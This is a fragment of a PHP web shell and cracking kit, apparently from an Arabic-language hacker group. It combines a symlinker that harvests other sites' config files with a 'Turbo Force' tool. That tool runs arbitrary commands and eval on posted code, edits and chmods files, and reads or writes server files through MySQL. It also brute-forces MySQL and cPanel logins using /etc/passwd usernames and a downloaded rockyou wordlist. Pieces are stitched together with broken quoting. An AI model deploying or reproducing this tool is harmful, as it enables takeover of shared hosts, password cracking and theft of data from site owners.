if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
}
}
}
}
break;
case 'help':
echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";
$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Safe Mode</td><td>$r</td>";
$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function symlink</td><td>$r</td>";
$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file</td><td>$r</td>";
$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file_get_contents</td><td>$r</td>";
$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function mkdir</td><td>$r</td>";
$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Permission denied</td><td>$r</td>";
$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
echo "<tr><td>Forbidden</td><td>$r</td>";
echo "</table></div>";
break;
default:
header("Location: $pg");
}
}else
{
echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
	else { echo '<br /><br />Not uploaded !!<br><br>'; }
}
echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}
function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}
echo '</div>
<a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
<a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
</body>
</html>
';
?>‘;
$file = fopen("sym.php" ,"w+");
$write = fwrite ($file ,base64_decode($symlinker));
fclose($file);
echo "<a href=damane/sym.php >Click Here</a>";
}
elseif ($action == ‚cpn‘) {
@chdir(‚damane‘);
$crackftp = ‚<?php
header('Content-Type: text/html; charset=windows-1256');
/*
Turbo Force By Tryag.Cc
*/
@set_time_limit(0);
@error_reporting(0);
if($_POST['page']=='chmod')
{
$pathclass=$_POST[pathclass];
$namefile=$_POST[namefile];
if(chmod($pathclass,$namefile))
{
echo '<center><b>License has been successfully';
}else{
echo '<center><b>Failure';
}

exit;
}


if($_POST['page']=='file_mysql')
{
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);

$query = "CREATE TABLE `ttt` (`wwww` TEXT NOT NULL) ENGINE = MYISAM ;";
if(mysql_query($query))
{
$codes=$_POST[codes];
$query2 = "INSERT INTO `ttt` (`wwww`)VALUES('$codes');";
if(mysql_query($query2))
{

$pathclass = $_POST['pathclass'];
if(mysql_query(stripslashes("select * into dumpfile '$pathclass' from ttt")))
{
echo "The file was created successfully<br>$pathclass";
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}else{
$error = mysql_error();
echo "Failure<br>$error";
}

}else{echo 'There is an error in accepting the code';
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}

}
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);

exit;
}

if($_POST['page']=='read_mysql')
{
$unique = uniqid('N');
$file = $_POST['pathclass'];
$query = array( "CREATE TEMPORARY TABLE $unique (file LONGBLOB)", "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique", "SELECT * FROM $unique" );
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);
echo '<textarea name="db_query" style="width: 800px; height: 400px;" dir="ltr">';
foreach($query as $Allqueries)
{
$mysqlQuery = mysql_query($Allqueries,$connect);
while($line = @mysql_fetch_row($mysqlQuery))
echo htmlspecialchars($line[0]);
}
echo '</textarea>';
exit;
}
if($_POST['page']=='download')
{
$namefile=$_POST['namefile'];

if($_POST['namefile']==null)
{
$test1=explode(".",$pathclass);
if(strpos($test1[0],"\\"))
{
$test2=explode("\\\\",$test1[0]);
}else{
$test2=explode("/",$test1[0]);
}
$st=count($test2);
$st=$st-1;
$namefile=$test2[$st].'.'.$test1[1];

}

	header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($namefile));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($namefile));
    ob_clean();
    flush();
    readfile($pathclass);
exit;
}

echo '
<html dir="rtl">

<head>



<style type="text/css">
.style1 {
	font-weight: bold;
	direction: rtl;
}

<!--
body {
	background-color: #000000;
    font-size: 18px;
	color: #cccccc;
}
input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}
a {
	background-color: #151515;
	vertical-align: bottom;
	color: #000;
	text-decoration: none;
	font-size: 20px;
	margin: 8px;
	padding: 6px;
	border: thin solid #000;
}
a:hover {
	background-color: #080808;
	vertical-align: bottom;
	color: #333;
	text-decoration: none;
	font-size: 20px;
	margin: 8px;
	padding: 6px;
	border: thin solid #000;
}
.style1 {
	text-align: center;
}
.style2 {
	color: #FFFFFF;
	font-weight: bold;
}
.style3 {
	color: #FFFFFF;
}
-->
</style>

</head>
';


function in($type,$name,$size,$value,$checked=0) 
 {
 $ret = "<input type=".$type." name=".$name." "; if($size != 0) 
 {
 $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
 
class my_sql 
 {
 var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() 
 {
 switch($this->db) 
 {
 case 'MySQL': if(empty($this->port)) 
 {
 $this->port = '3306'; }
 if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port)) 
 {
 $this->port = '1433'; }
 if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port)) 
 {
 $this->port = '5432'; }
 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
 return 0; }
 function select_db() 
 {
 switch($this->db) 
 {
 case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
 return 0; }
 function query($query) 
 {
 $this->res=$this->error=''; switch($this->db) 
 {
 case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
 {
 $this->error = @mysql_error($this->connection); return 0; }
 else if(is_resource($this->res)) 
 {
 return 1; }
 return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) 
 {
 $this->error = 'Query error'; return 0; }
 else if(@mssql_num_rows($this->res) > 0) 
 {
 return 1; }
 return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) 
 {
 $this->error = @pg_last_error($this->connection); return 0; }
 else if(@pg_num_rows($this->res) > 0) 
 {
 return 1; }
 return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) 
 {
 $this->error = 'Query parse error'; }
 else 
 {
 if(@ociexecute($this->res)) 
 {
 if(@ocirowcount($this->res) != 0) return 2; return 1; }
 $error = @ocierror(); $this->error=$error['message']; }
 break; }
 return 0; }
 function get_result() 
 {
 $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) 
 {
 case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; }
 return 0; }
 function dump($table) 
 {
 if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) 
 {
 case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
 return 1; }
 function close() 
 {
 switch($this->db) 
 {
 case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
 }
 function affected_rows() 
 {
 switch($this->db) 
 {
 case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
 }
 }
 if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name'])) 
 {
 if(!$file=@fopen($_POST['d_name'],"r")) 
 {
 err(1,$_POST['d_name']); $_POST['cccc']=""; }
 else 
 {
 @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) 
 {
 header('Content-Encoding: ' . $content_encoding); }
 header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
 }
 if(isset($_GET['phpinfo'])) 
 {
 echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
 if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query") 
 {
 echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
 {
 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
 {
 foreach($querys as $num=>$query) 
 {
 if(strlen($query)>5) 
 {
 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) 
 {
 case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) 
 {
 echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) 
 {
 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
 echo "</table>"; }
 break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
 }
 }
 }
 }
 echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>"; 
 echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query'); 
 echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }


function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
<table style="width: 100%" class="style1" dir="rtl">
	<tr>
		<td class="style9"><strong>Command:</strong></td>
	</tr>
	<tr>
		<td class="style13">
				<form method="post">
					<select name="att" dir="rtl" style="height: 109px" size="6">
';
if($_POST['att']==null)
{
echo '						<option value="system" selected="">system</option>';
}else{
echo "						<option value='$_POST[att]' selected=''>$_POST[att]</option>
						<option value=system>system</option>
";

						
}

echo '
						<option value="passthru">passthru</option>
						<option value="exec">exec</option>
						<option value="shell_exec">shell_exec</option>	
					</select>
						<input name="page" value="ccmmdd" type="hidden"><br>
						<input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
						<input type="submit" value="?????">
				</form>
		
		</td>
	</tr>
	<tr>
		<td class="style13">
';

		if($_POST[att]=='system')
		{
echo '
					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					system($_POST['ccmmdd2']);
echo '					</textarea>';


		}

		if($_POST[att]=='passthru')
		{
echo '
					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					passthru($_POST['ccmmdd2']);
echo '					</textarea>';


		}

		



		if($_POST[att]=='exec')
		{

echo '					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
					exec($_POST['ccmmdd2'],$res);
				echo $res = join("\n",$res); 				
echo '					</textarea>';


		}







		if($_POST[att]=='shell_exec')
		{

echo '					<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
				echo	shell_exec($_POST['ccmmdd2']);
echo '					</textarea>';


		}
echo '		
		</td>
	</tr>
</table>
';

exit;
}

if($_POST['page']=='edit')
{

$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}	


	if($_POST['page']=='upload')
	{

if($_FILES['img']['size'] > 0)
{
$path=$_POST['pathclass'];
$name=$_FILES['img']['name'];
if(strpos($path,"\\"))
{
$folder = $path."\\\\".basename($name);
}else{
$folder = $path."/".basename($name) ;
}

move_uploaded_file($_FILES['img']['tmp_name'],$folder);
if(strpos($path,"\\"))
{
echo '<center><b>Yes<br>'."$path\\\\$name";
}else{
echo '<center><b>Yes<br>'."$path/$name";
}


}else{
echo '<center><b>Error :No Enter File';
}

exit;
	}





	if($_POST['page']=='showdir')
	{
	$pathclass =$_POST['pathclass'];
	$pathclass = str_replace('\\\\','\\',$pathclass);

echo '
<form method="POST">
	<input name="pathclass" type="text" style="width: 284px" value="'.$pathclass.'" dir=ltr><input type="submit" value="???">
	<input name="page" type="hidden" value="showdir">
</form>
	
	<br>
';

function format_bytes($bytes) {
   if ($bytes < 1024) return $bytes.' B';
   elseif ($bytes < 1048576) return round($bytes / 1024, 2).' KB';
   elseif ($bytes < 1073741824) return round($bytes / 1048576, 2).' MB';
   elseif ($bytes < 1099511627776) return round($bytes / 1073741824, 2).' GB';
   else return round($bytes / 1099511627776, 2).' TB';
}

	$files1 = scandir($pathclass);

echo '
	<table border="1" width="100%" dir="ltr">
	<tr>
		<td>
		<p align="center"><b><span lang="en-us">name</span></b></td>
		<td>
		<p align="center"><span lang="en-us"><b>size</b></span></td>
		<td>
		<p align="center"><b><span lang="en-us">chmod</span></b></td>
		<td>
		<p align="center"><b><span lang="en-us">read or edit</span></b></td>
		<td>
		<p align="center"><b><span lang="en-us">dowload</span></b></td>
	</tr>
';
	foreach($files1 as $f)
	{
/*	echo "$f<br>";
$f=@filesize($f);
echo format_bytes($f);
*/
$fff="$pathclass$f";
$ff=@filesize($fff);
echo '
	<tr>
		<td>
		<p align="center">'.$f.'</td>
		<td>
		<p align="center">'.format_bytes($ff).'</td>
		<td>

		<p align="center">
';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input name="namefile" type="text" value="777" style="width: 45px;">
<input type="submit" value="Change" >
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="chmod">        				
</form>
';
}
echo '

		</td>
		<td>';

if($f=='.'||$f=='..')
{
//no
}elseif(strpos($f,".")){
echo '
<form method="POST" target="_blank">
<p align="center">

<input type="submit" value="Edit">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="page" type="hidden" value="show">        				
</p>

</form>
';
}

echo '		</td>
		<td>
		';
if($f=='.'||$f=='..')
{
}else{
echo '
<form method="POST" target="_blank">
<p align="center">
<input type="submit" value="Download">
<input name="pathclass" type="hidden" value="'.$fff.'">
<input name="namefile" type="hidden" value="'.$f.'">
<input name="page" type="hidden" value="download">        				
</form>
</p>
';
}

		
echo'		</td>

	</tr>
';

	}

echo '</table>';
exit;
	}

	if($_POST['page']=='code')
	{
	$code=$_POST[code];
	$code=str_replace('\\','',$code);
	eval($code);
	exit;
	}

	if($_POST['page']=='show')
	{
	$pathclass =$_POST['pathclass'];
echo '
<form method="POST">
<input type="hidden" name="page" value="edit">
';
	
	$sahacker = fopen($pathclass, "rb");
echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';	
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '</textarea>';	
	fclose($sahacker);
echo '
<br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
<br><strong><input type="submit" value="edit file">
</form>
';
		exit;
	}

	if($_POST['page']=='ccmmdd')
	{
	echo ccmmdd($ccmmdd2,$att);
	exit;
	}

if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
    if($_POST['type'] == 'passwd'){
        $e = explode("\n",$_POST['usernames']);
        foreach($e as $value){
        $k = explode(":",$value);
        $username .= $k['0']." ";
        }
        
        
    }elseif($_POST['type'] == 'simple'){
        $username = str_replace("\n",' ',$_POST['usernames']);
        
        
    }elseif($_POST['type'] == 'file'){
    $username = str_replace("\n",' ',$_POST['usernames']);    
	$namefile=$_POST['namefile'];
	$handle1 = fopen($namefile, "r");
	$_POST['passwords'] = fread($handle1, filesize($namefile));
	fclose($handle1);


    }elseif($_POST['type'] == 'url'){
    $username = str_replace("\n",' ',$_POST['usernames']);
	$ch = curl_init($_POST['namefile2']);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$_POST['passwords'] = curl_exec($ch);
/*
	$contextOptions['http'] = array('method' => 'GET', 'max_redirects'=>0, 'protocol_version'=> 1.0, 'timeout'=>10, 'ignore_errors'=>TRUE);
	$contextResouce  = stream_context_create($contextOptions);
	$url = $_POST['namefile2'];
	$handle = fopen("$url", 'r', false, $contextResouce);
	$_POST['passwords'] = stream_get_contents($handle);
	*/
    }  

    
    $a1 = explode(" ",$username);
    $a2 = explode("\n",$_POST['passwords']);
    $id2 = count($a2);
    $ok = 0;
    foreach($a1 as $user )
    {
        if($user !== '')
        {
        $user=trim($user);
         for($i=0;$i<=$id2;$i++)
         {
            $pass = trim($a2[$i]);
            $server=$_POST['server'];
            if(@mysql_connect("$server","$user","$pass"))
            {
                echo "<b dir=rtl>CrackeD Success With(<b><font color=green>$user</font></b>) PassworD (<b><font color=green>$pass</font></b>)<br />";
                $ok++;
            }
         }
        }
    }
    echo "<hr><b>CrackeD<font color=green>$ok</font>Account</b>";
    echo "<center><b><a href=".$_SERVER['PHP_SELF'].">Back</a>";
    exit;
}
}
?>


<body style="color: #FFFFFF">




<form method="POST" target="_blank">
	<strong>
<input name="page" type="hidden" value="find">        				
    </strong>
    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr>
        <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.upload-big.info/upload/7bbc23e8434e69fef6f87e4c58d387e0.gif" /><br>
		</strong>
		<strong>
		<a href="http://tryag.cc" class="style2">Cpanel Cracker</a></strong><br>
    </tr>
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Users :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames" dir="ltr">root
user1
user2</textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>PassworD :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"  dir="ltr">1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890</textarea></strong></td>
    </tr>
<tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Server :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong><input name="server" type="text" value="localhost"></strong></td>
    </tr>
    
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Kind Of User And Pass :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" class="style1">
    <span class="style2">
    <input type="radio" name="type" value="simple" checked="checked" class="style1"><b>Default:You Will Use The Default Pass List To Brute<br>
	</b> </span>
	<input type="radio" name="type" value="passwd" class="style1">
    <font class="style2"><b>/etc/passwd Users<br></b> </font>
	<input type="radio" name="type" value="file" class="style1"><span class="style3">
	<font class="style2"><b>Bruting With An IncludeD File At this Path<br>
	<input name="namefile" type="text" value="<?php echo realpath('')?>" style="width: 245px" dir="ltr" ><br>
	<input type="radio" name="type" value="url" class="style1">Bruting From An Uploaded Pass List<br>&nbsp;</b><input dir="ltr" name="namefile2" type="text" value="http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt" style="width: 245px" ><br>
	You Can Delete This<br>
	http://www.ethicalhack3r.co.uk/files/fuzzing/phpbb.txt<br>
	http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt</font></span></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="StarT Bruting">
    </strong>
    </td>
    <tr>
</form>    
    
    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
<input type="hidden" name="go" value="cmd_mysql">
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>MYSQL Manager</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>PassworD</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>CommanD ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<textarea name="db_query" style="width: 353px; height: 89px" dir="ltr">SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();</textarea></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="about"></strong></td>
    	</tr>
<input name="db" value="MySQL" type="hidden">
<input name="db_server" type="hidden" value="localhost">
<input name="db_port" type="hidden" value="3306">
<input name="cccc" type="hidden" value="db_query">
    	
</form>    	

    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Read A File By MYSQL</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Pass</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database Name</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>File Path~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
